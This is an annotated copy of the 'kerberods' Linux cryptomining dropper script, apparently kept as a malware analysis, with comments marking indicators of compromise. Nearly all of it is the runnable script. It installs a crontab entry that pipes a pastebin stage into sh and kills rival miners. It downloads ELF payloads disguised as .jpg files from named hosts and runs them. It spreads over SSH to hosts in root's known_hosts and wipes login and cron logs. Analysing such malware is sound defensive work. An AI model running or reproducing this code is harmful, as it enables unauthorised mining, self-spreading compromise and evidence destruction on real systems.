"kerberods" malware analysis
### Remediation references (identified as applicable when the sample is not a variant)
## https://laucyun.com/17e194c26e4554cab975aae760bad553.html
## https://git.laucyun.com/.../blob/master/clear_kerberods.sh
#
# Annotated copy of the "kerberods" dropper stage as served from the pastebin
# stages listed below. Kept as an analysis artifact: the values in it (stage
# URLs, download hosts, the crontab line, the process-name kill list, the two
# IPs, the /tmp/.XIMunix pid file, the "writeable" marker files) are the
# indicators to look for on a host suspected of infection.
#
# Stages in use. The three numbered lines are analysis notes, not commands;
# the "> GOTO 2" note marks stage 3 as handing off to stage 2. Stage 3
# (0Sxacvsh) is the URL the cron entry and the SSH spread below re-fetch.
1: http://pastebin.com/raw/wR3ETdbi # may change over time (volatile)
2: https://pastebin.com/raw/Zk7Jv9j2
3: https://pastebin.com/raw/0Sxacvsh > GOTO 2
# Staging prep: ensure /tmp exists and is world-writable with the sticky bit (1777).
mkdir -p /tmp
chmod 1777 /tmp
# Cron (re)registration. `crontab -` REPLACES the whole crontab of the running
# user with this single entry, which every 15 minutes downloads stage 3 and
# pipes it straight to sh. Detection: `crontab -l` / the user's spool file
# showing a pastebin.com/raw URL. Remediation has to remove this entry first,
# otherwise the dropper is re-run within 15 minutes.
echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/0Sxacvsh||wget -q -O- https://pastebin.com/raw/0Sxacvsh)|sh" | crontab -
# Process-kill section: SIGKILL every process whose `ps -ef` line matches one
# of the names below (presumably competing miners and other families; only the
# names are visible here). `grep -v grep` removes the grep itself from the
# candidates, awk prints column 2 (PID). The list doubles as a host IoC list.
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
# Note the capital "I" in the next pattern: it matches a systemctl look-alike name, not systemctl itself.
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "plfsbce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "luyybce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
# Presumably a process masquerading under the kernel image path -- not confirmed from this listing.
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
# Also kill any process holding a connection to these two IPs (`netstat -anp`
# column 7 is "PID/Program"; the sed strips "/Program"). Both addresses are
# network IoCs to check in flow logs and proxy/firewall records.
netstat -anp|grep 119.9.106.27|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 104.130.210.206|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
# Writable-directory probe, then forced removal of the markers. Starting from
# /tmp, a marker file is touched in each candidate install directory and each
# successful touch is followed by a cd, so the working directory ends up as the
# LAST writable one in the order /usr/local/bin, /usr/libexec, /usr/bin
# (staying in /tmp when none is writable). A leftover "writeable" file in one
# of these directories would point to an interrupted run.
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
# Payload download and execution
# https://ko.wikipedia.org/wiki/ELF_%ED%8C%8C%EC%9D%BC_%ED%98%95%EC%8B%9D
# Append the chosen install directory (the cwd left by the probe) to PATH so
# that a bare "kerberods" resolves in the execution chain further down.
export PATH=$PATH:$(pwd)
# /tmp/.XIMunix holds the PID of a running payload. (Re)install only when the
# pid file is absent or the PID it names has no /proc/<pid>/io, i.e. is not
# running. Detection: the pid file itself, and the process whose PID matches
# its contents.
if [ ! -f "/tmp/.XIMunix" ] || [ ! -f "/proc/$(cat /tmp/.XIMunix)/io" ]; then
# Drop the immutable attribute before deleting any previous copy -- presumably
# the payload is protected with chattr +i elsewhere (not shown in this stage).
chattr -i kerberods
rm -rf kerberods
ARCH=$(uname -m)
# Item suspected to be the decryptor/loader (ELF header)
# - http://1.z9ls.com/t6/701/1555396475x2918527158.jpg
# Per-architecture binaries (each saved as kerberods) ################## core part
# x86_64x
# - https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg
# i686x
# - https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg
# Download chain per architecture: primary host via curl, then wget, then the
# mirror via curl, then wget; chmod +x runs only if one of the four succeeded.
# The ".jpg" objects appear to be ELF payloads rather than images (see the ELF
# note above), so magic-byte / content inspection on egress is more useful
# than extension filtering. Note the else branch reuses the i686 URLs for every
# architecture other than x86_64. The "x" suffix on both sides of the
# comparison keeps `[` from seeing an empty operand when ARCH is unset.
if [ ${ARCH}x = "x86_64x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -O kerberods) && chmod +x kerberods
elif [ ${ARCH}x = "i686x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods
else
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods
fi
# Execute from every plausible location in turn; the `||` chain stops at the
# first copy that starts successfully. These seven paths are the places to
# look for the dropped binary during cleanup.
$(pwd)/kerberods || /usr/bin/kerberods || /usr/libexec/kerberods || /usr/local/bin/kerberods || kerberods || ./kerberods || /tmp/kerberods
fi
# Spread over SSH using root's known ssh hosts/keys: when root has a
# known_hosts and an RSA public key, every IPv4 address found in known_hosts
# is contacted with BatchMode (key auth only, no prompts) and host-key checking
# disabled, and the stage 3 download is started there in the background. The
# login is as the invoking user (root, given the /root/.ssh check). On a
# compromised host, root's known_hosts is therefore the list of hosts to check
# next; on those hosts, expect a key-based root login followed by a curl/wget
# to pastebin in the auth and process logs.
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/0Sxacvsh||wget -q -O- https://pastebin.com/raw/0Sxacvsh)|sh >/dev/null 2>&1 &' & done
fi
# Log wiping section. Note the form `echo 0>file`: the shell parses `0>` as a
# redirection of fd 0, so the file is opened with truncation and echo only
# writes a bare newline to stdout -- the net effect is still an emptied file.
# Expect root's mail spool, wtmp, secure and cron logs to be empty on an
# affected host; use journald, remote syslog or audit copies instead.
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron